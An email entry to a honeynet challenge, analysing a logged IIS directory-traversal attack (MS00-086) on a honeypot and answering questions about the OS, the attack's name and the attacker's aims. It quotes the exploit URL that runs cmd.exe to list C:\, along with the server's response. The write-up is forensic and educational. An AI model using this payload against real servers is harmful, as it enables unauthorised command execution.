From ndesai01@tampabay.rr.com Mon Feb 19 23:08:51 2001 Date: Mon, 19 Feb 2001 22:35:11 -0500 From: Neil Desai To: Lance Spitzner Subject: Entry for February Scan of the Month Here are my thoughts on the attack: ### QUESTION 1: What is the operating system of the honeypot, how do you know? The OS is Windows NT4 Server with IIS4 or Windows 2K with IIS5. This is given away by "GET /msadc/....../....../....../winnt/system32?". The "msadc" directory is installed by default with IIS4 as part of the default web site. It points to "(system drive)\Program Files\Common Files\system\msadc\". You can also tell by the output from the "dir c:\". ### QUESTION 2: What is the name of this attack? It is the "Web Server File Request Parsing" vulnerability and it is MS00-086. The basic problem is the way that IIS handles executables. Normally you should only be able to request the actual executable but IIS allows you to also send any associated commands or switches for the executable as well. This allows for many different avenues of attack to the web server. ### QUESTION 3: What is the attack attempting to accomplish? To issue commands to the underlying OS. In this case the attacker is issuing "dir c:\" and want to look at the contents of "C:\". By looking at the information that was sent back to the attacker they can easily tell that the web root in on the same drive as the OS. The attacker could also use it to start and FTP session from the web server to his/her machine to get files that would then be used for other things. The attacker could also redirect text to the homepage of the web server to deface the site. The attacker is using a Windows95 box with IE5.0 (User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows95)..) The attacker is "lib.bvxttrip.org". This is my assumption of what the user did: 1. Go to the main page of the web site. 2. Type the following in the URL line in the web browser after getting to the main page (minus the quotes): "172.16.0.106/msadc/....../....../....../winnt/system32/cmd.exe?/c+dir+c:\" This got them the output: HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Tue, 26 Dec 2000 13:05:30 GMT Connection: close Content-Type: application/octet-stream Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of c:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/20/00 05:13p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 12/20/00 05:14p WINNT 9 File(s) 78,643,522 bytes 1,779,191,808 bytes free Most of the data in the data is generated by the web browser and is irrelevant to the actual attack.